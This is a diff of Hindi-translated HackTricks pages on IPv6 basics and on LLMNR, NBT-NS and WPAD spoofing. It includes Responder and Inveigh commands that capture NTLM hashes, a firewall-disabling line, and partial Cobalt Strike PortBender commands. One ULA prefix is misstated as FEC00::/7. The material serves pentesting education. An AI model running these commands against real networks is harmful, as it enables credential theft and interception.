* यदि आप अपनी कंपनी का विज्ञापन देखना चाहते हैं **HackTricks** में या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
अगर आप चाहते हैं कि आप `/usr/share/nmap/nmap-service-probes` फ़ाइल में **`totalwaitms`** और **`tcpwrappedms`** के मानों को पूरी तरह से बदलना नहीं है, तो आप [पार्सिंग कोड](https://github.com/nmap/nmap/blob/master/service\_scan.cc#L1358) को संपादित कर सकते हैं ताकि ये मान `nmap-service-probes` फ़ाइल में पूरी तरह से नजरअंदाज किए जाएं।
|
||||
|
|
|
@ -1,16 +1,17 @@
|
|||
{% hint style="success" %}
|
||||
एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
जीसीपी हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) का खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** को पीआर जमा करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# IPv6 मूल सिद्धांत
|
||||
|
@ -19,24 +20,24 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
|
||||
IPv6 पते नेटवर्क संगठन और उपकरण अंतराक्रिया को बढ़ावा देने के लिए संरचित हैं। एक IPv6 पता इस प्रकार विभाजित होता है:
|
||||
|
||||
1. **नेटवर्क प्रिफिक्स**: पहले 48 बिट, जो नेटवर्क सेगमेंट को निर्धारित करते हैं।
|
||||
2. **सबनेट आईडी**: अगले 16 बिट, नेटवर्क के भीतर विशिष्ट सबनेट को परिभाषित करने के लिए उपयोग किए जाते हैं।
|
||||
3. **इंटरफेस पहचानकर्ता**: अंतिम 64 बिट, सबनेट के भीतर एक उपकरण को अद्वितीय रूप से पहचानने के लिए।
|
||||
1. **नेटवर्क प्रिफिक्स**: पहले 48 बिट, नेटवर्क सेगमेंट को निर्धारित करने वाले।
|
||||
2. **सबनेट आईडी**: अगले 16 बिट, नेटवर्क में विशिष्ट सबनेट को परिभाषित करने के लिए उपयोग किए जाते हैं।
|
||||
3. **इंटरफेस पहचानकर्ता**: अंतिम 64 बिट, सबनेट के भीतर एक उपकरण को विशेष रूप से पहचानने वाले।
|
||||
|
||||
जबकि IPv6 ARP प्रोटोकॉल को छोड़ देता है जो IPv4 में पाया जाता है, तो यह **ICMPv6** को पेश करता है जिसमें दो प्रमुख संदेश होते हैं:
|
||||
जबकि IPv6 ARP प्रोटोकॉल को छोड़ देता है जो IPv4 में पाया जाता है, तो यह **ICMPv6** को पेश करता है जिसमें दो मुख्य संदेश होते हैं:
|
||||
- **पड़ोसी अनुरोध (NS)**: पते के संक्षेपण के लिए मल्टीकास्ट संदेश।
|
||||
- **पड़ोसी विज्ञापन (NA)**: NS या स्वेच्छापूर्वक घोषणाओं के लिए यूनिकास्ट प्रतिक्रियाएँ।
|
||||
|
||||
IPv6 विशेष पता प्रकारों को भी शामिल करता है:
|
||||
- **लूपबैक पता (`::1`)**: IPv4 के `127.0.0.1` के समान, होस्ट के भीतर आंतरिक संचार के लिए।
|
||||
- **लिंक-स्थानीय पते (`FE80::/10`)**: स्थानीय नेटवर्क गतिविधियों के लिए, इंटरनेट रूटिंग के लिए नहीं। एक ही स्थानीय नेटवर्क पर उपकरण इस श्रेणी का उपयोग करके एक-दूसरे को खोज सकते हैं।
|
||||
- **लिंक-स्थानीय पते (`FE80::/10`)**: स्थानीय नेटवर्क गतिविधियों के लिए, इंटरनेट रूटिंग के लिए नहीं। एक ही स्थानीय नेटवर्क पर उपकरण एक-दूसरे को इस श्रेणी का उपयोग करके खोज सकते हैं।
|
||||
|
||||
### नेटवर्क कमांड में IPv6 का व्यावहारिक उपयोग
|
||||
### नेटवर्क कमांडों में IPv6 का व्यावहारिक उपयोग
|
||||
|
||||
IPv6 नेटवर्कों के साथ बातचीत करने के लिए आप विभिन्न कमांड का उपयोग कर सकते हैं:
|
||||
IPv6 नेटवर्क के साथ बातचीत करने के लिए आप विभिन्न कमांडों का उपयोग कर सकते हैं:
|
||||
- **पिंग लिंक-स्थानीय पतों**: `ping6` का उपयोग करके स्थानीय उपकरणों की मौजूदगी की जांच करें।
|
||||
- **पड़ोसी खोज**: लिंक पर खोजे गए उपकरणों को देखने के लिए `ip neigh` का उपयोग करें।
|
||||
- **alive6**: एक समान नेटवर्क पर उपकरणों की खोज के लिए एक वैकल्पिक उपकरण।
|
||||
- **alive6**: एक समान नेटवर्क पर उपकरणों को खोजने के लिए एक वैकल्पिक उपकरण।
|
||||
|
||||
नीचे कुछ कमांड उदाहरण हैं:
|
||||
```bash
|
||||
|
@ -48,43 +49,43 @@ alive6 eth0
|
|||
```
|
||||
## **MAC पते से Link-local IPv6 निकालना**
|
||||
|
||||
एक MAC पते **`12:34:56:78:9a:bc`** को जानते हुए, आप Link-local IPv6 पता निम्नलिखित तरीके से बना सकते हैं:
|
||||
दिये गए MAC पते **`12:34:56:78:9a:bc`** से निम्नलिखित रूप से Link-local IPv6 पता बनाया जा सकता है:
|
||||
|
||||
1. MAC को IPv6 प्रारूप में रूपांतरित करें: **`1234:5678:9abc`**
|
||||
2. `fe80::` जोड़ें और बीच में `fffe` डालें: **`fe80::1234:56ff:fe78:9abc`**
|
||||
3. बाएं से सातवें बिट को उलट दें, `1234` को `1034` में बदलें: **`fe80::1034:56ff:fe78:9abc`**
|
||||
3. बाएं से सातवां बिट उलटाएं, `1234` को `1034` में बदलें: **`fe80::1034:56ff:fe78:9abc`**
|
||||
|
||||
## **IPv6 पता प्रकार**
|
||||
|
||||
- **अद्वितीय स्थानीय पता (ULA)**: स्थानीय संचार के लिए, सार्वजनिक इंटरनेट मार्गनिर्देशन के लिए नहीं। प्रिफिक्स: **`FEC00::/7`**
|
||||
- **मल्टीकास्ट पता**: एक से अधिक संचार के लिए। सभी इंटरफेस में मल्टीकास्ट समूह में पहुंचाया जाता है। प्रिफिक्स: **`FF00::/8`**
|
||||
- **मल्टीकास्ट पता**: एक से अधिक संचार के लिए। सभी इंटरफेस मेंल्टीकास्ट समूह में पहुंचाया जाता है। प्रिफिक्स: **`FF00::/8`**
|
||||
- **एनीकास्ट पता**: एक से निकटतम संचार के लिए। मार्गनिर्देशन प्रोटोकॉल के अनुसार सबसे निकट इंटरफेस पर भेजा जाता है। **`2000::/3`** वैश्विक यूनिकास्ट सीमा का हिस्सा।
|
||||
|
||||
## **पता प्रिफिक्स**
|
||||
- **fe80::/10**: लिंक-स्थानीय पते (169.254.x.x के समान)
|
||||
- **fc00::/7**: अद्वितीय स्थानीय-यूनिकास्ट (10.x.x.x, 172.16.x.x, 192.168.x.x जैसे निजी IPv4 सीमाएं के समान)
|
||||
- **fc00::/7**: अद्वितीय स्थानीय-यूनिकास्ट (10.x.x.x, 172.16.x.x, 192.168.x.x के समान)
|
||||
- **2000::/3**: वैश्विक यूनिकास्ट
|
||||
- **ff02::1**: मल्टीकास्ट सभी नोड्स
|
||||
- **ff02::2**: मल्टीकास्ट राउटर नोड्स
|
||||
|
||||
## **नेटवर्क के भीतर IPv6 पते खोजना**
|
||||
## **नेटवर्क में IPv6 पते खोजना**
|
||||
|
||||
### तरीका 1: लिंक-स्थानीय पतों का उपयोग करना
|
||||
1. नेटवर्क के भीतर एक उपकरण का MAC पता प्राप्त करें।
|
||||
1. नेटवर्क में एक उपकरण का MAC पता प्राप्त करें।
|
||||
2. MAC पते से Link-local IPv6 पता निकालें।
|
||||
|
||||
### तरीका 2: मल्टीकास्ट का उपयोग करना
|
||||
1. स्थानीय नेटवर्क पर IPv6 पतों को खोजने के लिए मल्टीकास्ट पते `ff02::1` पर पिंग भेजें।
|
||||
1. स्थानीय नेटवर्क पर IPv6 पते खोजने के लिए मल्टीकास्ट पते `ff02::1` पर पिंग भेजें।
|
||||
```bash
|
||||
service ufw stop # Stop the firewall
|
||||
ping6 -I <IFACE> ff02::1 # Send a ping to multicast address
|
||||
ip -6 neigh # Display the neighbor table
|
||||
```
|
||||
## IPv6 मैन-इन-द-मिडल (MitM) हमले
|
||||
IPv6 नेटवर्क में MitM हमले करने के लिए कई तकनीकें मौजूद हैं, जैसे:
|
||||
IPv6 नेटवर्क में MitM हमले को करने के लिए कई तकनीकें मौजूद हैं, जैसे:
|
||||
|
||||
- ICMPv6 neighbor या राउटर विज्ञापनों का धोखा देना।
|
||||
- रूटिंग को मानिपुरित करने के लिए ICMPv6 रीडायरेक्ट या "पैकेट टू बिग" संदेश का उपयोग करना।
|
||||
- ICMPv6 नेबर या राउटर विज्ञापन का धोखा देना।
|
||||
- रूटिंग को मानिपुलेट करने के लिए ICMPv6 रीडायरेक्ट या "पैकेट टू बिग" संदेश का उपयोग करना।
|
||||
- मोबाइल IPv6 पर हमला करना (आम तौर पर IPSec को अक्षम करने की आवश्यकता होती है)।
|
||||
- एक रोग DHCPv6 सर्वर सेट करना।
|
||||
|
||||
|
@ -92,36 +93,21 @@ IPv6 नेटवर्क में MitM हमले करने के ल
|
|||
# ईल्ड में IPv6 पतों की पहचान
|
||||
|
||||
## सबडोमेन्स की खोज
|
||||
IPv6 पतों से जुड़े सबडोमेन्स को खोजने का एक तरीका सर्च इंजन का उपयोग करना है। उदाहरण के लिए, `ipv6.*` जैसा क्वेरी पैटर्न अच्छा साबित हो सकता है। विशेष रूप से, निम्नलिखित सर्च कमांड Google में उपयोग किया जा सकता है:
|
||||
IPv6 पतों से जुड़े सबडोमेन्स को खोजने का एक तरीका सर्च इंजन का उपयोग करना है। उदाहरण के लिए, `ipv6.*` जैसा एक क्वेरी पैटर्न असरकारी हो सकता है। विशेष रूप से, निम्नलिखित सर्च कमांड का उपयोग Google में किया जा सकता है:
|
||||
```bash
|
||||
site:ipv6./
|
||||
```
|
||||
## डीएनएस क्वेरी का उपयोग
|
||||
आईपीवी6 पते पहचानने के लिए, कुछ डीएनएस रिकॉर्ड प्रकारों का क्वेरी किया जा सकता है:
|
||||
- **AXFR**: पूर्ण जोन ट्रांसफर का अनुरोध करता है, जिससे व्यापक डीएनएस रिकॉर्ड्स प्रकट हो सकते हैं।
|
||||
- **AAAA**: सीधे आईपीवी6 पतों की खोज करता है।
|
||||
- **ANY**: सभी उपलब्ध डीएनएस रिकॉर्ड्स लौटाने वाला एक व्यापक क्वेरी।
|
||||
## DNS क्वेरी का उपयोग
|
||||
IPv6 पतों की पहचान के लिए, कुछ DNS रिकॉर्ड प्रकारों का पूछताछ किया जा सकता है:
|
||||
- **AXFR**: पूर्ण जोन स्थानांतरण का अनुरोध करता है, जिससे व्यापक DNS रिकॉर्ड्स का पता लग सकता है।
|
||||
- **AAAA**: सीधे IPv6 पतों की खोज करता है।
|
||||
- **ANY**: सभी उपलब्ध DNS रिकॉर्ड्स लौटाने वाला एक व्यापक क्वेरी।
|
||||
|
||||
## पिंग6 के साथ प्रोबिंग
|
||||
संगठन से जुड़े आईपीवी6 पतों को पहचानने के बाद, `ping6` यूटिलिटी का उपयोग प्रोबिंग के लिए किया जा सकता है। यह उपकरण पहचाने गए आईपीवी6 पतों की प्रतिक्रियाशीलता का मूल्यांकन करने में मदद करता है, और संगत आईपीवी6 उपकरणों की खोज में भी सहायक हो सकता है।
|
||||
## Ping6 के साथ प्रोबिंग
|
||||
संगठन से जुड़े IPv6 पतों को पहचानने के बाद, `ping6` यूटिलिटी का उपयोग प्रोबिंग के लिए किया जा सकता है। यह उपकरण पहचाने गए IPv6 पतों की प्रतिक्रियाशीलता का मूल्यांकन करने में मदद करता है, और संगत IPv6 उपकरणों का खोजने में भी सहायक हो सकता है।
|
||||
|
||||
|
||||
## संदर्भ
|
||||
|
||||
* [http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html](http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html)
|
||||
* [https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904](https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी कंपनी का विज्ञापन **HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live) पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में पीआर जमा करके।
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,62 +1,63 @@
|
|||
# Spoofing LLMNR, NBT-NS, mDNS/DNS और WPAD और रिले अटैक
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और प्रैक्टिस करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपने हैकिंग ट्रिक्स साझा करें।
|
||||
* [**सब्सक्रिप्शन योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **जुड़ें** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) से या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## नेटवर्क प्रोटोकॉल
|
||||
|
||||
### स्थानीय होस्ट संकेत प्रोटोकॉल
|
||||
### स्थानीय होस्ट संकेतन प्रोटोकॉल
|
||||
- **LLMNR, NBT-NS, और mDNS**:
|
||||
- माइक्रोसॉफ्ट और अन्य ऑपरेटिंग सिस्टम LLMNR और NBT-NS का उपयोग करते हैं जब DNS विफल होता है। उसी तरह, Apple और Linux सिस्टम mDNS का उपयोग करते हैं।
|
||||
- माइक्रोसॉफ्ट और अन्य ऑपरेटिंग सिस्टम LLMNR और NBT-NS का उपयोग स्थानीय नाम संकेतन के लिए करते हैं जब DNS विफल होता है। उसी तरह, Apple और Linux सिस्टम mDNS का उपयोग करते हैं।
|
||||
- ये प्रोटोकॉल अपने अथेंटिकेटेड, यूडीपी पर प्रसारित प्रकृति के कारण अंतर्दृष्टि और स्पूफिंग के लिए संवेदनशील हैं।
|
||||
- [Responder](https://github.com/lgandx/Responder) का उपयोग किया जा सकता है सेवाओं का अनुकरण करने के लिए जो इन प्रोटोकॉलों का प्रश्न कर रहे होस्ट्स को झूठे जवाब भेजकर।
|
||||
- [Responder](https://github.com/lgandx/Responder) का उपयोग करके होस्ट जो इन प्रोटोकॉलों का प्रश्न कर रहे हैं को झूठे जवाब भेजकर सेवाओं का अनुकरण किया जा सकता है।
|
||||
- Responder का उपयोग करके सेवा अनुकरण के बारे में अधिक जानकारी [यहाँ](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) मिल सकती है।
|
||||
|
||||
### वेब प्रॉक्सी ऑटो-डिस्कवरी प्रोटोकॉल (WPAD)
|
||||
- WPAD ब्राउज़र को प्रॉक्सी सेटिंग्स को स्वचालित रूप से खोजने की अनुमति देता है।
|
||||
- खोज DHCP, DNS के माध्यम से सुविधा प्रदान करता है, या DNS विफल होने पर LLMNR और NBT-NS में लौटने की सुविधा प्रदान करता है।
|
||||
- Responder द्वारा WPAD हमलों को स्वचालित कर सकता है, ग्राहकों को दुरुपयोगी WPAD सर्वरों पर निर्देशित करता है।
|
||||
- खोज DHCP, DNS के माध्यम से सुविधा प्रदान करता है, या DNS विफल होने पर LLMNR और NBT-NS में लौटता है।
|
||||
- Responder WPAD अटैक को स्वचालित कर सकता है, ग्राहकों को दुरुपयोगी WPAD सर्वरों पर निर्देशित करता है।
|
||||
|
||||
### प्रोटोकॉल पॉइजनिंग के लिए Responder
|
||||
- **Responder** एक उपकरण है जो LLMNR, NBT-NS, और mDNS क्वेरी को पॉइजन करने के लिए उपयोग किया जाता है, प्रश्न प्रकार के आधार पर चुनकर प्रतिक्रिया देता है, मुख्य रूप से SMB सेवाओं को लक्ष्य बनाता है।
|
||||
- **Responder** एक उपकरण है जो LLMNR, NBT-NS, और mDNS क्वेरी के लिए पॉइजनिंग के लिए उपयोग किया जाता है, प्रश्न प्रकार के आधार पर चुनकर प्रतिक्रिया देता है, मुख्य रूप से SMB सेवाओं को लक्षित करता है।
|
||||
- यह Kali Linux में पूर्व-स्थापित है, `/etc/responder/Responder.conf` में कॉन्फ़िगर किया जा सकता है।
|
||||
- Responder स्क्रीन पर पकड़े गए हैश प्रदर्शित करता है और उन्हें `/usr/share/responder/logs` निर्देशिका में सहेजता है।
|
||||
- Responder द्वारा दर्ज किए गए हैश स्क्रीन पर प्रदर्शित करता है और उन्हें `/usr/share/responder/logs` निर्देशिका में सहेजता है।
|
||||
- यह IPv4 और IPv6 दोनों का समर्थन करता है।
|
||||
- Responder का Windows संस्करण यहाँ उपलब्ध है: [यहाँ](https://github.com/lgandx/Responder-Windows)।
|
||||
- Responder का Windows संस्करण [यहाँ](https://github.com/lgandx/Responder-Windows) उपलब्ध है।
|
||||
|
||||
#### Responder चलाना
|
||||
- डिफ़ॉल्ट सेटिंग्स के साथ Responder चलाने के लिए: `responder -I <Interface>`
|
||||
- अधिक प्रवेश के लिए प्रोबिंग (संभावित परिणामों के साथ): `responder -I <Interface> -P -r -v`
|
||||
- NTLMv1 चैलेंज/प्रतिक्रिया को आसान क्रैकिंग के लिए कैप्चर करने के तकनीक: `responder -I <Interface> --lm --disable-ess`
|
||||
- अधिक प्रोबिंग के लिए (संभावित प्रभावों के साथ): `responder -I <Interface> -P -r -v`
|
||||
- NTLMv1 चैलेंज/प्रतिक्रिया को आसानी से क्रैक करने के लिए तकनीकें: `responder -I <Interface> --lm --disable-ess`
|
||||
- WPAD अनुकरण को सक्रिय करने के लिए: `responder -I <Interface> --wpad`
|
||||
- NetBIOS अनुरोधों को हमलावर के IP पर हल किया जा सकता है, और प्रमाणीकरण प्रॉक्सी सेट किया जा सकता है: `responder.py -I <interface> -Pv`
|
||||
- NetBIOS अनुरोधों को हमलवर के IP पर हल किया जा सकता है, और प्रमाणीकरण प्रॉक्सी सेट किया जा सकता है: `responder.py -I <interface> -Pv`
|
||||
|
||||
### Responder के साथ DHCP पॉइजनिंग
|
||||
- DHCP प्रतिक्रियाओं को स्पूफ़ करने से एक पीड़ित का रूटिंग सूचना स्थायी रूप से पॉइजन की जा सकती है, ARP पॉइजनिंग के लिए एक गुप्त वैकल्पिकता प्रदान करती है।
|
||||
- लक्ष्य नेटवर्क के विन्यास के सटीक ज्ञान की आवश्यकता होती है।
|
||||
- हमला चलाने के लिए: `./Responder.py -I eth0 -Pdv`
|
||||
- यह विधि NTLMv1/2 हैश को प्रभावी ढंग से कैप्चर कर सकती है, लेकिन नेटवर्क विघटन से बचने के लिए सावधानी से हैंडल करने की आवश्यकता होती है।
|
||||
- DHCP प्रतिक्रियाओं को झूठलाने से एक पीड़ित का रूटिंग सूचना स्थायी रूप से पॉइजन किया जा सकता है, ARP पॉइजनिंग के लिए एक गुप्त विकल्प प्रदान करता है।
|
||||
- इसे लक्ष्य नेटवर्क के विन्यास के सटीक ज्ञान की आवश्यकता होती है।
|
||||
- हमले को चलाने के लिए: `./Responder.py -I eth0 -Pdv`
|
||||
- यह विधि NTLMv1/2 हैश को प्रभावी ढंग से कैप्चर कर सकती है, लेकिन नेटवर्क विघटन से बचने के लिए सावधानी से हैंडल करना चाहिए।
|
||||
|
||||
### Responder के साथ क्रेडेंशियल कैप्चरिंग
|
||||
- Responder उपरोक्त प्रोटोकॉल का दुरुपयोग करके सेवाओं का अनुकरण करेगा, क्रेडेंशियल को कैप्चर करेगा (सामान्यत: NTLMv2 चैलेंज/प्रतिक्रिया) जब एक उपयोगकर्ता झूठी सेवाओं के खिलाफ प्रमाणीकरण करने का प्रयास करता है।
|
||||
- क्रैकिंग के लिए NetNTLMv1 या ESS को अक्षम करने के लिए प्रयास किए जा सकते हैं।
|
||||
### Responder के साथ क्रेडेंशियल कैप्चर
|
||||
- Responder उपरोक्त प्रोटोकॉलों का दुरुपयोग करके सेवाओं का अनुकरण करेगा, क्रेडेंशियल को कैप्चर करेगा (सामान्यत: NTLMv2 चैलेंज/प्रतिक्रिया) जब एक उपयोगकर्ता झूठी सेवाओं के खिलाफ प्रमाणीकरण करने का प्रयास करता है।
|
||||
- क्रैकिंग के लिए NTLMv1 या ESS को अक्षम करने के लिए नेटNTLMv1 की ओर डाउनग्रेड करने की कोशिश की जा सकती है।
|
||||
|
||||
यह महत्वपूर्ण है कि इन तकनीकों का उपयोग कानूनी और नैतिक रूप से किया जाए, उचित अधिकृति सुनिश्चित की जाए और अवैध पहुंच या अनधिकृत पहुंच से बचा जाए।
|
||||
यह महत्वपूर्ण है कि इन तकनीकों का उपयोग कानूनी और नैतिक रूप से किया जाना चाहिए, सही अधिकारिकरण सुनिश्चित करते हुए और अवैध पहुंच या अनधिकृत पहुंच से बचते हुए।
|
||||
|
||||
## Inveigh
|
||||
|
||||
Inveigh एक उपकरण है पेनेट्रेशन टेस्टर्स और रेड टीमर्स के लिए, विंडोज सिस्टम के लिए डिज़ाइन किया गया है। यह Responder के समान कार्यक्षमताएँ प्रदान करता है, स्पूफिंग और मैन-इन-द-मिडल हमले करता है। यह उपकरण एक PowerShell स्क्रिप्ट से C# बाइनरी में विकसित हुआ है, [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) और [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero) मुख्य संस्करण हैं। विस्तृत पैरामीटर और निर्देशों की जानकारी [**विकि**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters) में उपलब्ध है।
|
||||
Inveigh एक उपकरण है पेनेट्रेशन टेस्टर्स और रेड टीमर्स के लिए, विंडोज सिस्टमों के लिए डिज़ाइन किया गया है। यह Responder के समान कार्यक्षमताएँ प्रदान करता है, स्पूफिंग और मैन-इन-द-मिडल हमले करता है। यह उपकरण एक PowerShell स्क्रिप्ट से C# बाइनरी में विकसित हुआ है, [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) और [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero) मुख्य संस्करण हैं। विस्तृत पैरामीटर और निर्देशों को [**विकि**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters) में पाया जा सकता है।
|
||||
|
||||
Inveigh को PowerShell के माध्यम से चलाया जा सकता है:
|
||||
```powershell
|
||||
|
@ -74,7 +75,7 @@ Inveigh.exe
|
|||
|
||||
#### 445 पोर्ट फॉरवर्डिंग और टनलिंग
|
||||
|
||||
उन परिस्थितियों में जहाँ सीधा नेटवर्क परिचय संभव नहीं है, पोर्ट 445 पर ट्रैफिक को फॉरवर्ड और टनल किया जाना चाहिए। [**PortBender**](https://github.com/praetorian-inc/PortBender) जैसे उपकरण सहायक होते हैं पोर्ट 445 ट्रैफिक को एक और पोर्ट पर पुनर्निर्देशित करने में, जो ड्राइवर लोडिंग के लिए स्थानीय व्यवस्थापक एक्सेस उपलब्ध होने पर आवश्यक है।
|
||||
उन परिस्थितियों में जहाँ सीधा नेटवर्क परिचय संभव नहीं है, पोर्ट 445 पर ट्रैफिक को फॉरवर्ड और टनल करने की आवश्यकता होती है। [**PortBender**](https://github.com/praetorian-inc/PortBender) जैसे उपकरण सहायक होते हैं पोर्ट 445 ट्रैफिक को एक और पोर्ट पर पुनर्निर्देशित करने में, जो जरुरी होता है जब ड्राइवर लोडिंग के लिए स्थानीय व्यवस्थापक एक्सेस उपलब्ध हो।
|
||||
|
||||
कोबाल्ट स्ट्राइक में PortBender सेटअप और ऑपरेशन:
|
||||
```bash
|
||||
|
@ -96,13 +97,13 @@ beacon> socks stop
|
|||
|
||||
